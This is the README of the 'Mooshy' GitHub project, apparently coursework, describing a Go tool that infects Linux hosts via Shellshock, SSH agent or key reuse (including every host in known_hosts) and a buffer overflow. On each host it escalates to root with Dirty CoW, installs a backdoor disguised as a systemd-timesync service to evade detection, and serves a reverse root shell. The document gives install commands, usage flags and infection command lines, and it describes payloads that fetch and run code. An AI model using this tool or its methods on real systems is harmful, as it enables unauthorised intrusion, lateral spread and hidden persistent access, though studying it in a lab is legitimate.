![Build Status](https://travis-ci.org/rvolosatovs/mooshy.svg?branch=master)
Mooshy
Description
Mooshy is a tool that automates the infection and execution of arbitrary code on remote Linux systems. It infects the victim machine exploiting either a ShellShock Bash vulnerability or by using a password-less SSH key or a running SSH agent. Once access to the machine is granted, Dirty CoW exploit is used to start a SUID root shell, through which a backdoor is installed on the system, masked as a systemd service file.
![asciicast](https://asciinema.org/a/176277.png)
Installation:
go get -u -v github.com/rvolosatovs/mooshy/cmd/mooshy
Development:
make
Generation of the report:
make report
\pagebreak
Usage:
Default values of some variables are environment-dependent
$ mooshy -help
Usage of mooshy:
-addr string
The lucky guy(in case of Shell Shock - endpoint)
-bufferOverflow
Use a buffer overflow for the infection
-c string
Command to run before shell start
-moosh string
Path to moosh. If empty - uses the one from https://github.com/rvolosatovs/mooshy/releases/latest
-shellShock
Use Shell Shock for the infection
-ssh
Use SSH for the infection
-sshAgent string
Path to SSH agent socket for SSH infection (default "/run/user/1000/gnupg/S.gpg-agent.ssh")
-sshKey string
Path to (passwordless) SSH private key for SSH infection (default "/home/rvolosatovs/.ssh/id_rsa")
-sshKnown string
Path to SSH known_hosts file for SSH infection (default "/home/rvolosatovs/.ssh/known_hosts")
-sshUser string
Username to connect as using SSH infection (default "rvolosatovs")
-tcp string
TCP address to listen on in execution mode (default ":0")
-token string
Github token to use
-useSSHAgent
Use SSH agent for SSH infection
-useSSHKey
Use (passwordless) SSH private key for SSH infection
-useSSHKnown
Infect all hosts in SSH known_hosts file using SSH infection
-wipe
Wipe the backdoor in execution mode (The self-destructing script will be appended to '-c')
\pagebreak
Mechanism of action
The tool operates in 2 modes - infection and execution.
Infection mode
mooshy -ssh -useSSHAgent -sshUser averagejoe -addr 192.168.56.102 # Specific SSH host
mooshy -ssh -useSSHAgent -useSSHKnown -sshKnown known_hosts -sshUser averagejoe # SSH known_hosts
mooshy -shellShock -addr http://192.168.56.102/cgi-bin/index.cgi # ShellShock
mooshy -bufferOverflow -addr 192.168.56.102:8080 # Buffer overflow
- Connects to the victim machine(s) using either of:
- SSH:
- Connects to the
addr
specified and/or all hosts in known_hosts
file, using either a running SSH agent(with SSH_AUTH_SOCK
set in environment) or using a password-less private key, which provides access to the machine(s).
- Copies the
moosh
binary to each victim using SFTP.
- Shellshock:
- Sends a GET request to
addr
specified, with embedded script in User-Agent
header, which downloads moosh
binary using curl
and makes it executable.
- Buffer overflow:
- Sends a GET request to the specified
addr
, containing a payload to exploit a buffer overflow in the hHTTPd
server, which downloads the moosh
binary using wget
and executes it.
- Executes the
moosh
binary on the victim machine, which:
- Exploits Linux kernel vulnerability(CVE-2016-5195) (PoC uses vanilla Ubuntu 16.04 LTS VM) to overwrite a SUID binary(defaults
/usr/bin/passwd
) by shellcode, which sets /proc/sys/vm/dirty_writeback_centisecs
to 0
and exec
s /bin/bash
with root
privileges(it's a SUID binary owned by root
). Note, that setting /proc/sys/vm/dirty_writeback_centisecs
to 0
is required to prevent kernel panic, which would otherwise occur shortly after the execution of exploit due to an invalid state reached, which is triggered by the exploit.
- Using the "suid root shell" installs the backdoor on the system.
- Creates, enables and starts a
systemd-timesync
systemd service, which launches the backdoor service.
- Restores the contents of the original binary in it's location and removes all temporary files.
\pagebreak
Execution mode
mooshy -addr 192.168.56.102:22 # The port should be any open port
- Connects to the backdoor running on the infected victim and returns a reverse
root
shell.
\pagebreak
Attack analysis
Dirty CoW exploit
A race condition was found in the way Linux kernel's memory subsystem
handled breakage of the read only private mappings COW situation on
write access.
An unprivileged local user could use this flaw to gain
write access to otherwise read only memory mappings and thus increase
their privileges on the system. (Source)
Shellshock
A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue. (Source)
Infection
Once root access is gained through the Dirty CoW exploit, the machine is infected with a persistent backdoor. The binary code for the backdoor is embedded in the moosh
binary. It creates and enables a new systemd service in /lib/systemd/system/systemd-timesync.service
and installs the binary as /lib/sytemd/systemd-timesync
. This name was chosen for its similarity to the existing systemd-timesyncd
service, to hopefully avoid detection from unsuspecting users. All traces of the exploit are then erased, leaving only the newly installed service.
\pagebreak
Backdoor
The systemd-timesync
service creates a raw socket that listens to TCP requests. The raw socket allows the backdoor to listen on all TCP ports with a single socket, while the TCP payload is still handled by the kernel so that normal service by the victim machine is unaffected. When a packet with a specific payload is received, it triggers the backdoor to open a reverse shell to the attacker's machine. The payload consists of a sentinel value, followed by the port number on which the attacker is listening for a reverse shell connection.
The backdoor then opens a new TCP connection to the source IP of the triggering packet, using the specified port. Since the backdoor is run as a systemd service, it has no TTY attached. Instead, it uses the script
executable, which is installed on linux by default, to create a PTY and connect it to /bin/bash
. This opens a fully interactive root shell on the victim's machine, whose input and output are then connected to the opened TCP connection.
Buffer overflow
A buffer overflow occurs when more data is put in a buffer than it can hold, leading to overwrite adjacent memory locations being overwritten. This problem can be abused to alter the return address and inject code on the stack.
To illustrate this concept, a vulnerable HTTP daemon (hHTTPd
) is supplied as a proof of concept. It stores the HTTP request and reflects the path back to the client in the message body. However, if the user requests a path that is too long, it overflows the request buffer. This vulnerability is exploited to gain code execution.
Technical setup
The PoC uses vanilla Ubuntu 16.04 LTS with Bash version 4.3-6, OpenSSH service and Apache2 web server running.
Setup script can be found at ./setup.sh
.